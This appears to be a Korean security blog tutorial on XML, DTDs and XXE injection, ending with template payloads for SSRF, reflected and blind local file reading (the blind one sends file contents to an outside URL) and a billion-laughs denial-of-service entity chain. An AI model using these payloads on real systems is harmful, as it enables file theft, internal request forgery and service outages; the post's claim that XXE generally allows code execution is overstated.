XXE Injection (Basic Concept & Real World Case)

What is XML(eXtensible Markup Language)?

XML은 데이터 저장과 전송에 초점을 둔 언어이다. 여러 종류의 응용 프로그램에서 데이터와 문서를 유연하게 전송 & 저장하도록 설계되었다. 미리 정의된 태그 외에도 임의로 태그를 정의할 수 있다.

[ 종류 ]

[ XML DTD ]

XML DTD(Docuemtn Type Definition)을 사용해 미리 정의된 문서 구조에 대해 XML 문서의 유효성 검사가 가능하다.

<!DOCTYPE email [
  <!ELEMENT email (date, time, sender, recipients, body)>
  <!ELEMENT recipients (to, cc?)>
  <!ELEMENT cc (to*)>
  <!ELEMENT date (#PCDATA)>
  <!ELEMENT time (#PCDATA)>
  <!ELEMENT sender (#PCDATA)>
  <!ELEMENT to  (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
]>
<!-- Parsed Character DATA: 파서에 의해 분석될 문자 데이터 -->

위 예시처럼 DTD는 ELEMENT 타입 선언과 함께 root인 email을 선언하고 child 요소를 나타낸다.
이후 child 요소들이 정의된다. child 요소는 본인의 child 요소를 또 가질 수도 있고, 원시 데이터를 포함할 수도 있다. DTD는 첫 번째 줄의 XML 선언 바로 뒤에 배치하거나, 외부 파일 형태로 저장하고 아래와 같이 SYSTEM 키워드를 이용하여 참조될 수 있다.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email SYSTEM "email.dtd">

[ XML Entity ]

XML DTD에서 entity를 정의하여변수를 리팩토링하고 반복되는 데이터를 줄일 수 있다. 아래 예시와 같이 키워드 뒤에 entity이름과 값이 나오는 방식으로 사용한다.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
  <!ENTITY company "Security Company">
]>

entity가 선언되면 XML 문서에서 "&"와 ";" 사이에서 참조될 수 있다. (e.g. &company;)
entity가 참조될 때마다 해당 entity는 XML Parser에 의해 해당 값으로 바뀐다. 또한 아래와 같이 외부 XML entity를 SYSTESM 키워드와 함께 참조할 수 있다.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "http://localhost/company.txt">
  <!ENTITY signature SYSTEM "file:///var/www/html/signature.txt">
]>

XXE Injection의 핵심은 "SYSTEM" 함수를 이용하여 Local File Leak, 악의적인 요청을 강제하는 등을 수행할 수 있다는 것이다.

What is XXE?

XXE는 "XML External Entity"의 약자로 어플리케이션의 XML 파싱하는 동작을 이용하여 공격 트리거가 가능하다. 기본적으로 Code Execution이 가능하므로 치명적이다.

Types of XXE

Reflected XXE : 대표적으로 Response를 통해 서버 파일에 접근 가능
Blind XXE : 대표적으로 DoS, 의도하지 않은 외부 호스트로의 요청 가능

Common Payload

SSRF

  <?xml version="1.0"?>
  <!DOCTYPE root [  
  <!ELEMENT root (#ANY)>
  <!ENTITY test SYSTEM "URL">]><xxe>&test;</xxe>

LFI (Reflected)

<?xml version="1.0"?>
<!DOCTYPE root [  
<!ELEMENT root (#ANY)>
<!ENTITY test SYSTEM "file://PATH">]><xxe>&test;</xxe>

LFI (Blind)

<?xml version="1.0"?>
<!DOCTYPE root [  
<!ELEMENT root (#ANY)>
<!ENTITY test SYSTEM "file://PATH">
<!ENTITY blind SYSTEM "URL/?%test;">]><xxe>&blind;</xxe>

DoS

<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lola "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lolb "&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;">
<!ENTITY lolc "&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;">
<!ENTITY lold "&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;">
<!ENTITY lole "&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;">
<!ENTITY lolf "&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;">
<!ENTITY lolg "&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;">
<!ENTITY lolh "&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;">
<!ENTITY loli "&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;">
]>
<attack>&loli;</attack>

Real World Case

Reference

hoppi tistory

저작자표시 비영리 변경금지

What is XML(eXtensible Markup Language)?

[ 종류 ]

[ XML DTD ]

[ XML Entity ]

What is XXE?

Types of XXE

Common Payload

Real World Case

티스토리툴바